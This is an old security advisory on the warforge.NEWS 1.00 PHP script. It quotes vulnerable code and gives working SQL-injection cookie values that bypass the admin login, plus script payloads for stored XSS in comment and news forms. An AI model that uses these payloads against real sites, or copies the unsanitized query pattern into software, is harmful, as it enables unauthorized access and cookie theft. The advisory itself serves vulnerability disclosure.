warforge.NEWS

2006-04-27T00:00:00
ID SECURITYVULNS:DOC:12439
Type securityvulns
Reporter Securityvulns
Modified 2006-04-27T00:00:00

Description

warforge.NEWS exploit i've paste it on: http://forum.zone-h.org/viewtopic.php?t=5468



  • warforge.NEWS <=1.00 Multiple Vulnerabilities - -= http://colander.altervista.org/ =-

-= warforge.NEWS =-

yamcho April 26, 2006

Vunerability(s):

SQL Injection XSS

Product:

warforge.NEWS 1.00

Vendor:

http://www.thewarforge.com/

Description of product:

warforge.NEWS is a script designed for easy use/implementation. It has a full featured administration section and is powered by a mysql database.

Vulnerability / Exploit:

SQL Injection

In the file authcheck.php there is a flaw, that can allow a user to login as Admin.

The code is:

[...]

if(isset($_COOKIE["authaccess"]) || isset($_COOKIE["authusername"])) { // This checks to make sure the username and password in the cookie are actual users, // this checks everytime you load a page to prevent cookie spoofing $usern = $_COOKIE["authusername"]; $pass = $_COOKIE["authpassword"]; mysql_connect($db_Host, $db_Username, $db_Pass); mysql_select_db($db_Database); $cookiecheck = mysql_query("SELECT * FROM $usertable WHERE username = '$usern' AND password = '$pass'");

[...]

So, if a remote user add this cookies to his cookies list:

1) authusername=ADMINUSERNAME'/*; authpassword=null; authfirst_name=null; authlast_name=null; authaccess=null; authemail=null;

or this:

2) authusername=null; authpassword=' OR '1'='1; authfirst_name=null; authlast_name=null; authaccess=null; authemail=null;

The query will be:

1) SELECT * FROM $usertable WHERE username = 'ADMINUSERNAME'/*' AND password = '$pass'"

2) SELECT * FROM $usertable WHERE username = '$usern' AND password = '' OR '1'='1'"

The remote user now is logged in as Admin.

XSS

In the file news.php there is a flaw, that can allow a user to make an XSS attack.

The code is:

[...]

if(isset($_GET["newcomment"]) == "yes") { // This is where it processes the mysql to add a new comment $name = $_POST["name"]; $email = $_POST["email"]; $title = $_POST["title"]; $comment = $_POST["comment"];

[...]

Some of this camps can be use to make an XSS attack.

So, if a remote user use this

><script>alert(document.cookies);</script>

into 'Your Name', 'Title' and 'Comment' form's field, he can gain data information.

In the file newsadd.php there is a flaw, that can allow a user that as login to make an XSS attack.

The code is:

[...]

if(isset($_POST["addstory"]) == "1") { // add the news post error checking blah blah $title = $_POST["title"]; $author = $_COOKIE["authusername"]; $email = $_COOKIE["authemail"]; $newspost = $_POST["newspost"];

[...]

Some of this camps can be use to make an XSS attack.

So, if a remote user use this

<script>alert(document.coockies);</script>

into 'Title' and/or 'Story' form's field, he can gain data information.

Credits:

yamcho yamcho[at]email[dot]it

-- Email.it, the professional e-mail, gratis per te: http://www.email.it/f

Sponsor: DVD vergini: acquista online a prezzi vantaggiosi! Clicca qui: http://adv.email.it/cgi-bin/foclick.cgi?mid=4589&d=27-4